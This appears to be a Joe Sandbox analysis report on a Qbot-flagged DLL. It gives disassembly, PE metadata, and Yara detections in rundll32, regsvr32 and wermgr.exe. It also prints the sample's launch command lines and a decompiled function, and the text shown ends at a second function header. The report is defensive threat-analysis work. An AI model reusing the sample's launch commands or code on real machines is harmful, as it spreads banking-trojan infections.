jne 00007FF004C6C223h
ret
jmp 00007FF004C6C7CBh
mov ecx, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [10033014h]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [10033014h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], esp
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
int3
int3
int3
int3
push ecx
lea ecx, dword ptr [esp+08h]
sub ecx, eax
and ecx, 0Fh
add eax, ecx
sbb ecx, ecx
or eax, ecx
pop ecx
jmp 00007FF004C6C90Fh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x31800	0x6c	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3186c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x56000	0xb890	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x62000	0x1da8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2fb70	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x24000	0x15c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2215c	0x22200	False	0.555016597985348	data	6.649026882960341	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x24000	0xe03c	0xe200	False	0.5316993915929203	data	5.664939250342234	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x33000	0x22ccc	0x22000	False	0.8333668428308824	DOS executable (block device driver \377\377\377\377\261)	6.797248626276144	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x56000	0xb890	0xba00	False	0.17794438844086022	data	3.888171262767214	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x62000	0x1da8	0x1e00	False	0.746484375	data	6.525986142096821	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x56588	0xb13	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	Russian	Russia
RT_ICON	0x570a0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Russian	Russia
RT_ICON	0x57f48	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Russian	Russia
RT_ICON	0x587f0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Russian	Russia
RT_ICON	0x58d58	0xc4a	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	Russian	Russia
RT_ICON	0x599a8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	Russian	Russia
RT_ICON	0x5dbd0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Russian	Russia
RT_ICON	0x60178	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Russian	Russia
RT_ICON	0x61220	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Russian	Russia
RT_GROUP_ICON	0x61688	0x84	data	Russian	Russia
RT_VERSION	0x562b0	0x2d4	data	Russian	Russia
RT_MANIFEST	0x61710	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL

Import

KERNEL32.dll

Sleep, VirtualAlloc, GetCommandLineA, CreateFileW, GetFileSize, CloseHandle, CreateFileA, LocalAlloc, GetModuleFileNameA, DebugBreak, ReadFile, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, MultiByteToWideChar, LCMapStringEx, GetStringTypeW, GetCPInfo, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, GetCurrentProcess, TerminateProcess, RtlUnwind, RaiseException, InterlockedFlushSList, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, GetStdHandle, GetFileType, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, SetFilePointerEx, SetStdHandle, HeapSize, FlushFileBuffers, WriteFile, GetConsoleOutputCP, GetConsoleMode, WriteConsoleW

ADVAPI32.dll

CryptCreateHash, CryptHashData, CryptDestroyHash, CryptGetHashParam, CryptReleaseContext, CryptAcquireContextA

Exports

Name	Ordinal	Address
DllRegisterServer	1	0x10006510
DllUnregisterServer	2	0x10007d50

Possible Origin

Language of compilation system	Country where language is spoken	Map
Russian	Russia
English	United States

Network Behavior

⊘No network behavior found

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exePID: 1540, Parent PID: 3528

General

Target ID:	0
Start time:	16:52:06
Start date:	10/10/2022
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll"
Imagebase:	0x8f0000
File size:	116736 bytes
MD5 hash:	1F562FBF37040EC6C43C8D5EF619EA39
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1592, Parent PID: 1540

General

Target ID:	1
Start time:	16:52:06
Start date:	10/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5832, Parent PID: 1540

General

Target ID:	2
Start time:	16:52:06
Start date:	10/10/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1
Imagebase:	0xd90000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 5828, Parent PID: 1540

General

Target ID:	3
Start time:	16:52:06
Start date:	10/10/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\diatomaceous.dat.dll
Imagebase:	0xab0000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000003.00000003.322721841.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000003.00000003.322721841.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000003.00000003.322721841.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 5792, Parent PID: 5832

General

Target ID:	4
Start time:	16:52:06
Start date:	10/10/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1
Imagebase:	0xd80000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000004.00000003.322963828.0000000004960000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000004.00000003.322963828.0000000004960000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000004.00000003.322963828.0000000004960000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000004.00000002.330333126.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000004.00000002.330333126.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000004.00000002.330333126.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 5820, Parent PID: 1540

General

Target ID:	5
Start time:	16:52:06
Start date:	10/10/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\diatomaceous.dat.dll,DllRegisterServer
Imagebase:	0xd80000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000005.00000003.323262277.0000000003000000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000005.00000003.323262277.0000000003000000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000005.00000003.323262277.0000000003000000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000005.00000002.330442684.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000005.00000002.330442684.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000005.00000002.330442684.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 1228, Parent PID: 1540

General

Target ID:	6
Start time:	16:52:09
Start date:	10/10/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\diatomaceous.dat.dll,DllUnregisterServer
Imagebase:	0xd80000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: wermgr.exePID: 4648, Parent PID: 5828

General

Target ID:	7
Start time:	16:52:12
Start date:	10/10/2022
Path:	C:\Windows\SysWOW64\wermgr.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\wermgr.exe
Imagebase:	0x2b0000
File size:	191904 bytes
MD5 hash:	CCF15E662ED5CE77B5FF1A7AAE305233
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000007.00000000.329030667.0000000002520000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000007.00000000.329030667.0000000002520000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000007.00000000.329030667.0000000002520000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000007.00000002.331498854.0000000002520000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000007.00000002.331498854.0000000002520000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000007.00000002.331498854.0000000002520000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: wermgr.exePID: 4744, Parent PID: 5792

General

Target ID:	8
Start time:	16:52:12
Start date:	10/10/2022
Path:	C:\Windows\SysWOW64\wermgr.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\wermgr.exe
Imagebase:	0x2b0000
File size:	191904 bytes
MD5 hash:	CCF15E662ED5CE77B5FF1A7AAE305233
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000008.00000002.332320278.0000000002580000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000008.00000002.332320278.0000000002580000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000008.00000002.332320278.0000000002580000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000008.00000000.329252836.0000000002580000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000008.00000000.329252836.0000000002580000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000008.00000000.329252836.0000000002580000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: wermgr.exePID: 3668, Parent PID: 5820

General

Target ID:	9
Start time:	16:52:12
Start date:	10/10/2022
Path:	C:\Windows\SysWOW64\wermgr.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\wermgr.exe
Imagebase:	0x2b0000
File size:	191904 bytes
MD5 hash:	CCF15E662ED5CE77B5FF1A7AAE305233
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000009.00000000.329591797.0000000002BC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000009.00000000.329591797.0000000002BC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000009.00000000.329591797.0000000002BC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: loaddll32.exePID: 1540, Parent PID: 3528COMMON

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	13

Executed Functions

Function 6DA514D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 192
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E6DA514D0(void* __ebx, struct HINSTANCE__** __ecx, void* __eflags) {
				struct HINSTANCE__* _v8;
				intOrPtr _v16;
				char _v17;
				long _v24;
				struct HINSTANCE__** _v28;
				long _v32;
				void* _v36;
				struct _OVERLAPPED* _v40;
				char* _v44;
				struct HINSTANCE__* _v48;
				struct HINSTANCE__* _v52;
				struct HINSTANCE__* _v56;
				struct HINSTANCE__* _v72;
				intOrPtr* _v92;
				void* _t49;
				long _t50;
				void* _t51;
				void* _t56;
				intOrPtr _t57;
				struct HINSTANCE__* _t60;
				struct HINSTANCE__* _t65;
				void* _t68;
				intOrPtr _t69;
				intOrPtr* _t73;
				struct HINSTANCE__* _t78;
				char _t82;
				struct _OVERLAPPED* _t86;
				void* _t88;
				intOrPtr* _t93;
				struct HINSTANCE__** _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				struct HINSTANCE__** _t100;
				intOrPtr _t101;
				void* _t104;
				struct HINSTANCE__* _t105;
				intOrPtr _t106;
				char* _t109;
				struct HINSTANCE__** _t110;
				void* _t112;
				CHAR* _t115;
				void* _t116;
				void* _t117;
				struct HINSTANCE__* _t118;
				struct HINSTANCE__** _t120;
				intOrPtr* _t122;
				struct HINSTANCE__** _t124;
				intOrPtr _t127;
				intOrPtr _t131;

				_t127 = _t131;
				_push(0xffffffff);
				_push(E6DA72315);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t131;
				_push(__ebx);
				_v72 = 0;
				_v28 = __ecx;
				_v56 = 0;
				_v52 = 0xf;
				_v72 = 0;
				_push(0x30c);
				_v8 = 0;
				_t115 = E6DA5DB20();
				GetModuleFileNameA(0, _t115, 0x30c);
				_t109 = 0;
				_v48 = 0;
				_t86 = 0;
				_v44 = 0;
				_v40 = 0;
				_v8 = 1;
				_t49 = CreateFileA(_t115, 0x80000000, 3, 0, 3, 0, 0); // executed
				_t116 = _t49;
				_t50 = GetFileSize(_t116, 0);
				_v24 = _t50;
				_t51 = LocalAlloc(0, _t50);
				_v36 = _t51;
				_v32 = 0;
				ReadFile(_t116, _t51, _v24,  &_v32, 0); // executed
				FindCloseChangeNotification(_t116); // executed
				_t117 = 0;
				if(_v24 <= 0) {
					_t118 = 0;
				} else {
					do {
						_t82 =  *((intOrPtr*)(_t117 + _v36));
						_v17 = _t82;
						if(_t109 == _t86) {
							E6DA518A0( &_v48, _t109,  &_v17);
							_t86 = _v40;
							_t109 = _v44;
						} else {
							 *_t109 = _t82;
							_t109 = _t109 + 1;
							_v44 = _t109;
						}
						_t117 = _t117 + 1;
					} while (_t117 < _v24);
					_t118 = _v48;
				}
				_t56 = E6DA5B200(_t118, 0, _t109 - _t118);
				_t92 =  !=  ? _t56 : _t109;
				_t144 = ( !=  ? _t56 : _t109) - _t109;
				_t110 = _v28;
				 *_t110 = 0;
				_t110[4] = 0;
				_t110[5] = 0xf;
				 *_t110 = 0;
				if(( !=  ? _t56 : _t109) == _t109) {
					_t93 = 0;
					_t32 = _t93 + 1; // 0x1
					_t104 = _t32;
					asm("o16 nop [eax+eax]");
					do {
						_t57 =  *_t93;
						_t93 = _t93 + 1;
					} while (_t57 != 0);
					_push(_t93 - _t104);
					_t95 = _t110;
					E6DA51770(_t95, 0);
					if(_t118 == 0) {
						goto L13;
					} else {
						_t88 = _t86 - _t118;
						_t60 = _t118;
						if(_t88 < 0x1000) {
							goto L12;
						} else {
							_t118 =  *(_t118 - 4);
							_t88 = _t88 + 0x23;
							if(_t60 - _t118 + 0xfffffffc <= 0x1f) {
								goto L12;
							} else {
								goto L19;
							}
						}
					}
				} else {
					_push(0x21);
					_t95 = _t110;
					E6DA51770(_t95, "gjdhkdfgkjsdghfkjsdhkjslfdghsdkjl");
					if(_t118 == 0) {
						L13:
						 *[fs:0x0] = _v16;
						return _t110;
					} else {
						_t88 = _t86 - _t118;
						_t78 = _t118;
						if(_t88 < 0x1000) {
							L12:
							_push(_t88);
							E6DA593C9(_t118);
							goto L13;
						} else {
							_t118 =  *(_t118 - 4);
							_t88 = _t88 + 0x23;
							if(_t78 - _t118 + 0xfffffffc > 0x1f) {
								L19:
								E6DA5DACF(_t88, _t95, _t104);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t118);
								_t120 = _t95;
								_t65 =  *_t120;
								if(_t65 == 0) {
									L25:
									return _t65;
								} else {
									_t98 = _t120[2] - _t65;
									if(_t98 < 0x1000) {
										L24:
										_push(_t98);
										_t65 = E6DA593C9(_t65);
										 *_t120 = 0;
										_t120[1] = 0;
										_t120[2] = 0;
										goto L25;
									} else {
										_t105 =  *(_t65 - 4);
										_t98 = _t98 + 0x23;
										if(_t65 - _t105 + 0xfffffffc > 0x1f) {
											_t68 = E6DA5DACF(_t88, _t98, _t105);
											asm("int3");
											asm("int3");
											asm("int3");
											_push(_t120);
											_t122 = _t98;
											_t99 =  *(_t122 + 0x14);
											if(_t99 < 0x10) {
												L32:
												 *(_t122 + 0x10) = 0;
												 *(_t122 + 0x14) = 0xf;
												 *_t122 = 0;
												return _t68;
											} else {
												_t69 =  *_t122;
												_t100 =  &(_t99->i);
												if(_t100 < 0x1000) {
													L31:
													_push(_t100);
													_t68 = E6DA593C9(_t69);
													goto L32;
												} else {
													_t106 =  *((intOrPtr*)(_t69 - 4));
													_t100 =  &(_t100[8]);
													if(_t69 - _t106 + 0xfffffffc > 0x1f) {
														E6DA5DACF(_t88, _t100, _t106);
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														_push(_t127);
														_t107 = _v92;
														_t73 = _v92;
														_push(_t122);
														_t124 = _t100;
														_push(_t110);
														_t43 = _t73 + 1; // 0x1
														_t112 = _t43;
														 *_t124 = 0;
														_t124[4] = 0;
														_t124[5] = 0xf;
														do {
															_t101 =  *_t73;
															_t73 = _t73 + 1;
														} while (_t101 != 0);
														_push(_t73 - _t112);
														E6DA51770(_t124, _t107);
														return _t124;
													} else {
														_t69 = _t106;
														goto L31;
													}
												}
											}
										} else {
											_t65 = _t105;
											goto L24;
										}
									}
								}
							} else {
								goto L12;
							}
						}
					}
				}
			}

0x6da514d1
0x6da514d3
0x6da514d5
0x6da514e0
0x6da514e1
0x6da514eb
0x6da514ed
0x6da514f5
0x6da514f8
0x6da514ff
0x6da51506
0x6da5150a
0x6da5150f
0x6da5151e
0x6da51528
0x6da5152e
0x6da51530
0x6da51537
0x6da51539
0x6da5153c
0x6da5154c
0x6da51550
0x6da51556
0x6da5155a
0x6da51562
0x6da51565
0x6da5156f
0x6da51576
0x6da5157b
0x6da51582
0x6da51588
0x6da5158d
0x6da515c3
0x6da51590
0x6da51590
0x6da51593
0x6da51596
0x6da5159b
0x6da515ad
0x6da515b2
0x6da515b5
0x6da5159d
0x6da5159d
0x6da5159f
0x6da515a0
0x6da515a0
0x6da515b8
0x6da515b9
0x6da515be
0x6da515be
0x6da515cd
0x6da515d9
0x6da515dc
0x6da515de
0x6da515e1
0x6da515e7
0x6da515ee
0x6da515f5
0x6da515f8
0x6da51645
0x6da51647
0x6da51647
0x6da5164a
0x6da51650
0x6da51650
0x6da51652
0x6da51653
0x6da51659
0x6da5165c
0x6da5165e
0x6da51665
0x00000000
0x6da51667
0x6da51667
0x6da51669
0x6da51671
0x00000000
0x6da51673
0x6da51673
0x6da51676
0x6da51681
0x00000000
0x00000000
0x00000000
0x00000000
0x6da51681
0x6da51671
0x6da515fa
0x6da515fa
0x6da51601
0x6da51603
0x6da5160a
0x6da51632
0x6da51639
0x6da51644
0x6da5160c
0x6da5160c
0x6da5160e
0x6da51616
0x6da51628
0x6da51628
0x6da5162a
0x00000000
0x6da51618
0x6da51618
0x6da5161b
0x6da51626
0x6da51683
0x6da51683
0x6da51688
0x6da51689
0x6da5168a
0x6da5168b
0x6da5168c
0x6da5168d
0x6da5168e
0x6da5168f
0x6da51690
0x6da51691
0x6da51693
0x6da51697
0x6da516d6
0x6da516d7
0x6da51699
0x6da5169c
0x6da516a4
0x6da516b8
0x6da516b8
0x6da516ba
0x6da516bf
0x6da516c8
0x6da516cf
0x00000000
0x6da516a6
0x6da516a6
0x6da516a9
0x6da516b4
0x6da516d8
0x6da516dd
0x6da516de
0x6da516df
0x6da516e0
0x6da516e1
0x6da516e3
0x6da516e9
0x6da51712
0x6da51712
0x6da51719
0x6da51720
0x6da51724
0x6da516eb
0x6da516eb
0x6da516ed
0x6da516f4
0x6da51708
0x6da51708
0x6da5170a
0x00000000
0x6da516f6
0x6da516f6
0x6da516f9
0x6da51704
0x6da51725
0x6da5172a
0x6da5172b
0x6da5172c
0x6da5172d
0x6da5172e
0x6da5172f
0x6da51730
0x6da51733
0x6da51736
0x6da51738
0x6da51739
0x6da5173b
0x6da5173c
0x6da5173c
0x6da5173f
0x6da51745
0x6da5174c
0x6da51753
0x6da51753
0x6da51755
0x6da51756
0x6da5175e
0x6da51760
0x6da5176a
0x6da51706
0x6da51706
0x00000000
0x6da51706
0x6da51704
0x6da516f4
0x6da516b6
0x6da516b6
0x00000000
0x6da516b6
0x6da516b4
0x6da516a4
0x00000000
0x00000000
0x00000000
0x6da51626
0x6da51616
0x6da5160a

APIs

GetModuleFileNameA.KERNEL32(00000000,00000000,0000030C,?), ref: 6DA51528
CreateFileA.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 6DA51550
GetFileSize.KERNEL32(00000000,00000000), ref: 6DA5155A
LocalAlloc.KERNEL32(00000000,00000000), ref: 6DA51565
ReadFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 6DA5157B
FindCloseChangeNotification.KERNELBASE(00000000), ref: 6DA51582

Strings

gjdhkdfgkjsdghfkjsdhkjslfdghsdkjl, xrefs: 6DA515FC

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: File$AllocChangeCloseCreateFindLocalModuleNameNotificationReadSize
String ID: gjdhkdfgkjsdghfkjsdhkjslfdghsdkjl
API String ID: 664754120-448965468
Opcode ID: ff565ffa46d59dffc87981ce197c68fe45a12e10942a43c02e2e644997bcf5c3
Instruction ID: 3bd50bfe2ce071fe2a082e0410f261e20a8e14e70cbba029f5b52e5bfd58cce4
Opcode Fuzzy Hash: ff565ffa46d59dffc87981ce197c68fe45a12e10942a43c02e2e644997bcf5c3
Instruction Fuzzy Hash: 83513771D092159FEB118FA8CD84BBEBBFCEF09314F190219E901A7680D7B45E818BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6DA59988 Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

